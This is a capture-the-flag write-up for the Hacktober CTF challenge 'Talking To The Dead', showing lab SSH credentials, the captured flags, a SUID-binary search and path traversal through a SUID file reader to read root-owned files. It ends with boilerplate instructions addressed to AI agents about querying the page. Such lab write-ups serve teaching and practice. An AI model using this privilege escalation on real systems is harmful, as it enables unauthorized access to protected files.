# Talking To The Dead ```bash Author: syyntax We've obtained access to a server maintained by spookyboi. There are four flag files that we need you to read and submit (flag1.txt, flag2.txt, etc). Submit the contents of flag1.txt. ssh hacktober@env.hacktober.io Password: hacktober-Underdog-Truth-Glimpse ``` ## Flags 1 and 2: SSHing in and running the command `whoami` we see we're logged in as `luciafer`. Navigating to `/home/luciafer/Documents`, I ran `ls -alt` and the output was as follows: ```bash luciafer@40504779afeb:~/Documents$ ls -alt total 20 drwxrwxr-x 1 luciafer luciafer 4096 Oct 6 08:36 . -rw-rw-r-- 1 luciafer luciafer 47 Oct 6 08:36 .flag2.txt -rw-rw-r-- 1 luciafer luciafer 47 Oct 5 14:55 flag1.txt drwxr-xr-x 1 luciafer luciafer 4096 Oct 5 14:54 .. ``` Since `luciafer` owns both these files, I can simply run `cat flag1.txt` and `cat .flag2.txt` to get the flags. flag 1: `flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c}`\ flag 2: `flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf}` ## Flags 3 and 4: After looking around, I found flag3.txt located at `/home/spookyboi/Documents/flag3.txt` and flag4.txt at `/root/flag4.txt`. Since luciafer doesn't have sufficient perms to read these files, I ran the command\ `find / -perm -u=s -type f 2>/dev/null` to find SUID files. SUID is a special file permission for executable files, which enables other users to run the file with effective permissions of the file owner. This means we could privilege escalate to root or a higher privileged user, giving us perms to read the flag files. This was the output: ```bash luciafer@40504779afeb:/root$ find / -perm -u=s -type f 2>/dev/null /usr/bin/umount /usr/bin/passwd /usr/bin/mount /usr/bin/gpasswd /usr/bin/su /usr/bin/chsh /usr/bin/newgrp /usr/bin/chfn /usr/local/bin/ouija /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper ``` The program `ouija` jumped out to me, so i tried running it: ```bash luciafer@40504779afeb:/root$ /usr/local/bin/ouija OUIJA 6.66 - Read files in the /root directory Usage: ouija [FILENAME] EXAMPLES: ouija file.txt ouija read.meluciafer@40504779afeb:/root$ ``` Excellent! it reads files in the `/root` directory, meaning we simply go ``` luciafer@40504779afeb:/root$ /usr/local/bin/ouija flag4.txt flag{4781cbffd13df6622565d45e790b4aac2a4054dc} ``` We use the same program to get the flag from flag3.txt as so: ``` luciafer@40504779afeb:/root$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt flag{445b987b5b80e445c3147314dbfa71acd79c2b67} ``` Note: as we start in the `/root` directory, so must go back one (`../`) to navigate to flag3.txt. By das --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://crypt0nite.gitbook.io/writeups/ctfs/hacktoberctf/linux/talking-to-the-dead.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.